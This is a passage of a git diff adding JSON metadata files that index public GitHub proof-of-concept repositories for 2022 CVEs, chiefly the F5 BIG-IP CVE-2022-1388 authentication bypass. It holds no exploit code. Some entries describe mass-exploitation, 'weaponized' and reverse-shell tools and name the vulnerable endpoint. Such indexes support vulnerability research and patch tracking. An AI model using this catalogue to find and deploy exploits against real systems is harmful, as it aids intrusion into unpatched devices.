0, + "subscribers_count": 1 + }, + { + "id": 492651669, + "name": "CVE-2022-1388", + "full_name": "Wrin9\/CVE-2022-1388", + "owner": { + "login": "Wrin9", + "id": 54984589, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/54984589?v=4", + "html_url": "https:\/\/github.com\/Wrin9", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Wrin9\/CVE-2022-1388", + "description": null, + "fork": false, + "created_at": "2022-05-16T01:49:44Z", + "updated_at": "2024-08-12T20:23:18Z", + "pushed_at": "2022-05-16T01:52:19Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 493209789, + "name": "CVE-2022-1388-rs", + "full_name": "aancw\/CVE-2022-1388-rs", + "owner": { + "login": "aancw", + "id": 6284204, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6284204?v=4", + "html_url": "https:\/\/github.com\/aancw", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/aancw\/CVE-2022-1388-rs", + "description": "CVE-2022-1388 F5 BIG-IP iControl REST Auth Bypass RCE written in Rust", + "fork": false, + "created_at": "2022-05-17T10:51:39Z", + "updated_at": "2024-04-11T07:17:26Z", + "pushed_at": "2022-06-01T09:09:07Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 497326298, + "name": "F5-BIG-IP-POC", + "full_name": "west9b\/F5-BIG-IP-POC", + "owner": { + "login": "west9b", + "id": 103512651, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/103512651?v=4", + "html_url": "https:\/\/github.com\/west9b", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/west9b\/F5-BIG-IP-POC", + "description": "CVE-2020-5902 CVE-2021-22986 CVE-2022-1388 POC集合", + "fork": false, + "created_at": "2022-05-28T13:30:22Z", + "updated_at": "2023-09-13T08:48:13Z", + "pushed_at": "2022-07-30T00:16:29Z", + "stargazers_count": 11, + "watchers_count": 11, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 11, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 499893663, + "name": "F5-BIG-IP-exploit", + "full_name": "sashka3076\/F5-BIG-IP-exploit", + "owner": { + "login": "sashka3076", + "id": 76051636, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76051636?v=4", + "html_url": "https:\/\/github.com\/sashka3076", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sashka3076\/F5-BIG-IP-exploit", + "description": "CVE-2022-1388", + "fork": false, + "created_at": "2022-06-04T17:30:04Z", + "updated_at": "2022-05-17T03:24:54Z", + "pushed_at": "2022-05-17T10:45:04Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 505264102, + "name": "CVE-2022-1388", + "full_name": "Chocapikk\/CVE-2022-1388", + "owner": { + "login": "Chocapikk", + "id": 88535377, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88535377?v=4", + "html_url": "https:\/\/github.com\/Chocapikk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Chocapikk\/CVE-2022-1388", + "description": "CVE-2022-1388 | F5 - Big IP Pre Auth RCE via '\/mgmt\/tm\/util\/bash' endpoint", + "fork": false, + "created_at": "2022-06-20T01:58:40Z", + "updated_at": "2024-08-30T21:56:39Z", + "pushed_at": "2022-10-16T15:21:17Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 505672326, + "name": "CVE-2022-1388", + "full_name": "li8u99\/CVE-2022-1388", + "owner": { + "login": "li8u99", + "id": 37184853, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37184853?v=4", + "html_url": "https:\/\/github.com\/li8u99", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/li8u99\/CVE-2022-1388", + "description": "CVE-2022-1388 | F5 - Big IP Pre Auth RCE via '\/mgmt\/tm\/util\/bash' endpoint", + "fork": false, + "created_at": "2022-06-21T03:09:26Z", + "updated_at": "2022-06-20T05:14:08Z", + "pushed_at": "2022-06-20T02:00:06Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 506835397, + "name": "Mass-CVE-2022-1388", + "full_name": "electr0lulz\/Mass-CVE-2022-1388", + "owner": { + "login": "electr0lulz", + "id": 106660834, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/106660834?v=4", + "html_url": "https:\/\/github.com\/electr0lulz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/electr0lulz\/Mass-CVE-2022-1388", + "description": "Mass-Exploit-CVE-2022-1388", + "fork": false, + "created_at": "2022-06-24T00:58:37Z", + "updated_at": "2022-07-12T08:48:37Z", + "pushed_at": "2022-06-24T01:30:40Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "1388", + "bash", + "big-ip", + "cve", + "cve-2022-1388", + "f5", + "f5-bigip", + "f5networks", + "python", + "shodan" + ], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 509548569, + "name": "CVE-2022-1388_refresh", + "full_name": "Luchoane\/CVE-2022-1388_refresh", + "owner": { + "login": "Luchoane", + "id": 40374879, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40374879?v=4", + "html_url": "https:\/\/github.com\/Luchoane", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Luchoane\/CVE-2022-1388_refresh", + "description": "PoC for exploiting CVE-2022-1388 on BIG IP F5", + "fork": false, + "created_at": "2022-07-01T18:08:50Z", + "updated_at": "2022-07-07T19:22:09Z", + "pushed_at": "2022-07-01T20:04:27Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 510239425, + "name": "CVE-2022-1388", + "full_name": "jbharucha05\/CVE-2022-1388", + "owner": { + "login": "jbharucha05", + "id": 13020621, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13020621?v=4", + "html_url": "https:\/\/github.com\/jbharucha05", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jbharucha05\/CVE-2022-1388", + "description": "CVE-2022-1388, bypassing iControl REST authentication", + "fork": false, + "created_at": "2022-07-04T06:31:56Z", + "updated_at": "2022-07-04T07:08:22Z", + "pushed_at": "2022-07-04T10:37:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-1388", + "f5-big-ip-icontrol-rest-rce", + "f5-bigip" + ], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 557286411, + "name": "CVE-2022-1388", + "full_name": "On-Cyber-War\/CVE-2022-1388", + "owner": { + "login": "On-Cyber-War", + "id": 114944421, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/114944421?v=4", + "html_url": "https:\/\/github.com\/On-Cyber-War", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/On-Cyber-War\/CVE-2022-1388", + "description": "cURL one-liner to test for CVE-2022-1388 BIG-IP iControl REST RCE", + "fork": false, + "created_at": "2022-10-25T12:15:31Z", + "updated_at": "2022-10-25T12:15:31Z", + "pushed_at": "2022-10-25T12:23:50Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 557293075, + "name": "CVE-2022-1388", + "full_name": "forktheplanet\/CVE-2022-1388", + "owner": { + "login": "forktheplanet", + "id": 61333042, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61333042?v=4", + "html_url": "https:\/\/github.com\/forktheplanet", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/forktheplanet\/CVE-2022-1388", + "description": "cURL one-liner to test for CVE-2022-1388 BIG-IP iControl REST RCE", + "fork": false, + "created_at": "2022-10-25T12:29:54Z", + "updated_at": "2023-08-14T21:05:37Z", + "pushed_at": "2023-05-19T05:55:52Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 572343924, + "name": "CVE-2022-1388", + "full_name": "revanmalang\/CVE-2022-1388", + "owner": { + "login": "revanmalang", + "id": 91707288, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/91707288?v=4", + "html_url": "https:\/\/github.com\/revanmalang", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/revanmalang\/CVE-2022-1388", + "description": null, + "fork": false, + "created_at": "2022-11-30T04:06:56Z", + "updated_at": "2022-12-16T12:56:47Z", + "pushed_at": "2022-11-30T04:07:51Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "exploit" + ], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 575059061, + "name": "CVE-2022-1388", + "full_name": "amitlttwo\/CVE-2022-1388", + "owner": { + "login": "amitlttwo", + "id": 55759090, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55759090?v=4", + "html_url": "https:\/\/github.com\/amitlttwo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/amitlttwo\/CVE-2022-1388", + "description": null, + "fork": false, + "created_at": "2022-12-06T16:59:56Z", + "updated_at": "2023-02-07T11:10:10Z", + "pushed_at": "2023-02-07T11:02:37Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 576167094, + "name": "CVE-2022-1388", + "full_name": "M4fiaB0y\/CVE-2022-1388", + "owner": { + "login": "M4fiaB0y", + "id": 95071636, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/95071636?v=4", + "html_url": "https:\/\/github.com\/M4fiaB0y", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/M4fiaB0y\/CVE-2022-1388", + "description": "Scan IP ranges for IP's vulnerable to the F5 Big IP exploit (CVE-2022-1388)", + "fork": false, + "created_at": "2022-12-09T06:51:21Z", + "updated_at": "2022-12-09T06:52:56Z", + "pushed_at": "2022-12-09T06:51:48Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 580855703, + "name": "CVE-2022-1388", + "full_name": "devengpk\/CVE-2022-1388", + "owner": { + "login": "devengpk", + "id": 41437020, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41437020?v=4", + "html_url": "https:\/\/github.com\/devengpk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/devengpk\/CVE-2022-1388", + "description": null, + "fork": false, + "created_at": "2022-12-21T16:11:48Z", + "updated_at": "2023-07-06T22:42:46Z", + "pushed_at": "2022-12-21T17:35:41Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 581717116, + "name": "CVE-2022-1388", + "full_name": "vaelwolf\/CVE-2022-1388", + "owner": { + "login": "vaelwolf", + "id": 58718722, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/58718722?v=4", + "html_url": "https:\/\/github.com\/vaelwolf", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/vaelwolf\/CVE-2022-1388", + "description": "-- FOR EDUCATIONAL USE ONLY -- Proof-of-Concept RCE for CVE-2022-1388, plus some added functionality for blue and red teams", + "fork": false, + "created_at": "2022-12-24T03:59:24Z", + "updated_at": "2024-04-08T13:11:02Z", + "pushed_at": "2022-12-25T02:43:04Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-1388", + "exploit", + "pcap", + "reverse-shell" + ], + "visibility": "public", + "forks": 1, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 627124485, + "name": "tippa-my-tongue", + "full_name": "j-baines\/tippa-my-tongue", + "owner": { + "login": "j-baines", + "id": 113205286, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/113205286?v=4", + "html_url": "https:\/\/github.com\/j-baines", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/j-baines\/tippa-my-tongue", + "description": "F5 BIG-IP Exploit Using CVE-2022-1388 and CVE-2022-41800", + "fork": false, + "created_at": "2023-04-12T20:46:03Z", + "updated_at": "2023-04-14T17:24:44Z", + "pushed_at": "2023-04-12T21:03:44Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-1388", + "cve-2022-41800" + ], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 665620716, + "name": "F5-BIG-IP-Remote-Code-Execution-Vulnerability-CVE-2022-1388-A-Case-Study", + "full_name": "SudeepaShiranthaka\/F5-BIG-IP-Remote-Code-Execution-Vulnerability-CVE-2022-1388-A-Case-Study", + "owner": { + "login": "SudeepaShiranthaka", + "id": 58376903, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/58376903?v=4", + "html_url": "https:\/\/github.com\/SudeepaShiranthaka", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SudeepaShiranthaka\/F5-BIG-IP-Remote-Code-Execution-Vulnerability-CVE-2022-1388-A-Case-Study", + "description": "F5-BIG-IP Remote Code Execution Vulnerability CVE-2022-1388: A Case Study", + "fork": false, + "created_at": "2023-07-12T15:53:33Z", + "updated_at": "2023-07-12T15:53:34Z", + "pushed_at": "2023-07-12T15:54:04Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 673481578, + "name": "refresh", + "full_name": "battleofthebots\/refresh", + "owner": { + "login": "battleofthebots", + "id": 122462368, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/122462368?v=4", + "html_url": "https:\/\/github.com\/battleofthebots", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/battleofthebots\/refresh", + "description": "CVE-2022-1388 - F5 Router RCE Replica", + "fork": false, + "created_at": "2023-08-01T18:12:52Z", + "updated_at": "2023-10-16T10:21:39Z", + "pushed_at": "2023-10-11T22:07:52Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 738523749, + "name": "CVE-2022-1388-exploit", + "full_name": "nvk0x\/CVE-2022-1388-exploit", + "owner": { + "login": "nvk0x", + "id": 22233431, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22233431?v=4", + "html_url": "https:\/\/github.com\/nvk0x", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nvk0x\/CVE-2022-1388-exploit", + "description": "exploit poc", + "fork": false, + "created_at": "2024-01-03T12:28:06Z", + "updated_at": "2024-06-02T06:33:07Z", + "pushed_at": "2024-01-03T12:28:54Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 741149336, + "name": "CVE-2022-1388", + "full_name": "nico989\/CVE-2022-1388", + "owner": { + "login": "nico989", + "id": 55981787, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55981787?v=4", + "html_url": "https:\/\/github.com\/nico989", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nico989\/CVE-2022-1388", + "description": "PoC for CVE-2022-1388 affecting F5 BIG-IP.", + "fork": false, + "created_at": "2024-01-09T19:52:36Z", + "updated_at": "2024-03-23T10:44:09Z", + "pushed_at": "2024-01-12T22:42:14Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 793842153, + "name": "CVE-2022-1388", + "full_name": "gotr00t0day\/CVE-2022-1388", + "owner": { + "login": "gotr00t0day", + "id": 48636787, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48636787?v=4", + "html_url": "https:\/\/github.com\/gotr00t0day", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gotr00t0day\/CVE-2022-1388", + "description": "A remote code execution vulnerability exists in the iControl REST API feature of F5's BIG-IP product. An unauthenticated, remote attacker can exploit this to bypass authentication and execute arbitrary commands with root privileges.", + "fork": false, + "created_at": "2024-04-30T01:10:05Z", + "updated_at": "2024-11-08T09:40:55Z", + "pushed_at": "2024-04-30T01:12:19Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 856503073, + "name": "CVE-2022-1388", + "full_name": "impost0r\/CVE-2022-1388", + "owner": { + "login": "impost0r", + "id": 16020669, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16020669?v=4", + "html_url": "https:\/\/github.com\/impost0r", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/impost0r\/CVE-2022-1388", + "description": "Old weaponized CVE-2022-1388 exploit.", + "fork": false, + "created_at": "2024-09-12T17:25:23Z", + "updated_at": "2024-09-12T17:27:23Z", + "pushed_at": "2024-09-12T17:27:10Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 892945436, + "name": "cve-2022-1388-poc", + "full_name": "XiaomingX\/cve-2022-1388-poc", + "owner": { + "login": "XiaomingX", + "id": 5387930, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5387930?v=4", + "html_url": "https:\/\/github.com\/XiaomingX", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/XiaomingX\/cve-2022-1388-poc", + "description": "CVE-2022-1388 是一个影响 F5 BIG-IP 应用交付控制器(ADC)的严重漏洞。以下是对其原理和危害的详细介绍:", + "fork": false, + "created_at": "2024-11-23T05:39:26Z", + "updated_at": "2024-11-24T06:35:13Z", + "pushed_at": "2024-11-23T05:41:08Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "exp", + "poc" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-1421.json b/2022/CVE-2022-1421.json new file mode 100644 index 0000000000..c0c505e4f7 --- /dev/null +++ b/2022/CVE-2022-1421.json @@ -0,0 +1,33 @@ +[ + { + "id": 513177414, + "name": "CVE-2022-1421", + "full_name": "nb1b3k\/CVE-2022-1421", + "owner": { + "login": "nb1b3k", + "id": 35418661, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35418661?v=4", + "html_url": "https:\/\/github.com\/nb1b3k", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nb1b3k\/CVE-2022-1421", + "description": null, + "fork": false, + "created_at": "2022-07-12T14:34:48Z", + "updated_at": "2024-01-09T09:55:01Z", + "pushed_at": "2022-11-01T12:44:36Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-1442.json b/2022/CVE-2022-1442.json new file mode 100644 index 0000000000..f334266e0d --- /dev/null +++ b/2022/CVE-2022-1442.json @@ -0,0 +1,33 @@ +[ + { + "id": 674189234, + "name": "CVE-2022-1442", + "full_name": "RandomRobbieBF\/CVE-2022-1442", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2022-1442", + "description": "WordPress Plugin Metform <= 2.1.3 - Improper Access Control Allowing Unauthenticated Sensitive Information Disclosure", + "fork": false, + "created_at": "2023-08-03T10:47:28Z", + "updated_at": "2024-08-12T20:32:20Z", + "pushed_at": "2023-08-03T10:49:16Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-1471.json b/2022/CVE-2022-1471.json new file mode 100644 index 0000000000..f17f702ed1 --- /dev/null +++ b/2022/CVE-2022-1471.json @@ -0,0 +1,64 @@ +[ + { + "id": 608740009, + "name": "SnakeYAML-CVE-2022-1471-POC", + "full_name": "1fabunicorn\/SnakeYAML-CVE-2022-1471-POC", + "owner": { + "login": "1fabunicorn", + "id": 19752126, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19752126?v=4", + "html_url": "https:\/\/github.com\/1fabunicorn", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/1fabunicorn\/SnakeYAML-CVE-2022-1471-POC", + "description": "Code for veracode blog", + "fork": false, + "created_at": "2023-03-02T16:33:02Z", + "updated_at": "2024-07-19T18:50:15Z", + "pushed_at": "2023-03-02T16:50:59Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 637852784, + "name": "snakeyaml_cve_poc", + "full_name": "falconkei\/snakeyaml_cve_poc", + "owner": { + "login": "falconkei", + "id": 19479860, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19479860?v=4", + "html_url": "https:\/\/github.com\/falconkei", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/falconkei\/snakeyaml_cve_poc", + "description": "SnakeYAML-CVE-2022-1471-POC", + "fork": false, + "created_at": "2023-05-08T14:46:22Z", + "updated_at": "2024-03-11T18:38:49Z", + "pushed_at": "2023-12-24T13:26:54Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-14733.json b/2022/CVE-2022-14733.json new file mode 100644 index 0000000000..68202d1fab --- /dev/null +++ b/2022/CVE-2022-14733.json @@ -0,0 +1,33 @@ +[ + { + "id": 580686451, + "name": "CVE-2022-14733", + "full_name": "hkzck\/CVE-2022-14733", + "owner": { + "login": "hkzck", + "id": 48936012, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48936012?v=4", + "html_url": "https:\/\/github.com\/hkzck", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hkzck\/CVE-2022-14733", + "description": null, + "fork": false, + "created_at": "2022-12-21T07:28:12Z", + "updated_at": "2022-12-21T07:28:12Z", + "pushed_at": "2022-12-21T07:30:21Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-1565.json b/2022/CVE-2022-1565.json new file mode 100644 index 0000000000..a1b41a0094 --- /dev/null +++ b/2022/CVE-2022-1565.json @@ -0,0 +1,33 @@ +[ + { + "id": 818221073, + "name": "CVE-2022-1565", + "full_name": "phanthibichtram12\/CVE-2022-1565", + "owner": { + "login": "phanthibichtram12", + "id": 95855503, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/95855503?v=4", + "html_url": "https:\/\/github.com\/phanthibichtram12", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/phanthibichtram12\/CVE-2022-1565", + "description": null, + "fork": false, + "created_at": "2024-06-21T11:08:26Z", + "updated_at": "2024-06-21T11:10:04Z", + "pushed_at": "2024-06-21T11:10:01Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-1597.json b/2022/CVE-2022-1597.json new file mode 100644 index 0000000000..c5b5f6081e --- /dev/null +++ b/2022/CVE-2022-1597.json @@ -0,0 +1,33 @@ +[ + { + "id": 492896386, + "name": "CVE-2022-1597", + "full_name": "V35HR4J\/CVE-2022-1597", + "owner": { + "login": "V35HR4J", + "id": 54109630, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/54109630?v=4", + "html_url": "https:\/\/github.com\/V35HR4J", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/V35HR4J\/CVE-2022-1597", + "description": " The plugin, used as a companion for the Discy and Himer themes, does not sanitise and escape a parameter on its reset password form which makes it possible to perform Reflected Cross-Site Scripting attacks", + "fork": false, + "created_at": "2022-05-16T15:33:48Z", + "updated_at": "2024-01-09T09:55:00Z", + "pushed_at": "2022-05-17T19:49:29Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-1598.json b/2022/CVE-2022-1598.json new file mode 100644 index 0000000000..d0ea3f0ef2 --- /dev/null +++ b/2022/CVE-2022-1598.json @@ -0,0 +1,33 @@ +[ + { + "id": 497902147, + "name": "CVE-2022-1598", + "full_name": "V35HR4J\/CVE-2022-1598", + "owner": { + "login": "V35HR4J", + "id": 54109630, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/54109630?v=4", + "html_url": "https:\/\/github.com\/V35HR4J", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/V35HR4J\/CVE-2022-1598", + "description": "WPQA < 5.5 - Unauthenticated Private Message Disclosure", + "fork": false, + "created_at": "2022-05-30T10:54:19Z", + "updated_at": "2022-06-06T10:04:50Z", + "pushed_at": "2022-05-30T11:01:21Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + 